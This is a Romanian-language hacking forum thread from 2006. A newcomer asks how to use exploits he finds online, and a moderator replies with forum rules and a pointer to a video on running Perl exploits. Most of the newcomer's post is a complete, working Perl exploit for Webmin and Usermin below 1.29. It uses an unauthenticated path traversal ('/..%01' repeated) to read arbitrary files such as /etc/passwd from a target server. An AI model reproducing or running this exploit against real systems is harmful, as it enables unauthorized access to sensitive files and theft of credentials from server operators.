DeathCom Posted July 19, 2006 Report Posted July 19, 2006 Buna... Cine poate sa imi spuna ce fac exploiturile (pana acum stiu doar unul msrpc_dcom_ms03_0269 win32_reverse_vncinject) si.... cand gasesti un exploit pe net... cum il folosesti? Ceva de genual asta:#!/usr/bin/perl#  Exploit for WEBMIN and USERMIN  less than 1.29x      #  ARBITARY REMOTE FILE DISCLOSURE#  WORKS FOR HTTP AND HTTPS (NOW)  #  Thrusday 13th  July 2006#  Vulnerability Disclosure at securitydot.net#  Coded by UmZ! [email]umz32.dll@gmail.com[/email]#  # ##  Make sure you have LWP before using this exploit.#  USE IT AT YOUR OWN RISK##  GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................#  for other.. like AHMED n FAIZ ... (GET A LIFE MAN).#  Revised on Friday 14th July 2006use LWP::Simple;use LWP::UserAgent;my $userag = LWP::UserAgent->new;  if (@ARGV < 4) {           print("Usage: $0 <url> <port> <filename> <target> n");           print("TARGETS aren ");    print("0  - > HTTP n");    print(" 1  - > HTTPSn");    print("Define full path with file name n");    print("Example: ./webmin.pl blah.com 10000 /etc/passwdn");    exit(1);           }           ($target, $port,$filename, $tar) = @ARGV;  print("WEBMIN EXPLOIT !!!!! coded by UmZ!n");  print("Comments and Suggestions are welcome at umz32.dll [at] gmail.comn");  print("Vulnerability disclose at securitydot.netnI am just coding it in perl 'cuz I hate PHP!n");  print("Attacking $target on port $port!n");  print("FILENAME:  $filenamen");   $temp="/..%01" x 40;   if ($tar == '0')  { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;  $content=get $url;  print("n FILE CONTENT STARTED");  print("n -----------------------------------n");  print("$content");  print("n -------------------------------------n");   }   elsif ($tar == '1')   {  my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;  my $req = HTTP::Request->new(GET => $url);  my $res = $userag->request($req);   if ($res->is_success) {      print("FILE CONTENT STARTEDn");   print("-------------------------------------------n");   print $res->as_string;    print("-------------------------------------------n");    }   else {     print "Failed: ", $res->status_line, "n";      }  }# milw0rm.com [2006-07-15] Quote
ghici Posted July 19, 2006 Report Posted July 19, 2006 1. wrong section2. trebe sa ai minim 10 posturi sa poti cere/ajutor la ceva3. citeste regulile4. ai un warning !5. te-ai uitat macar la sectiunea exploituri si pocs ? acolo este VIDEO cum sa rulezi exploit in perl ! Quote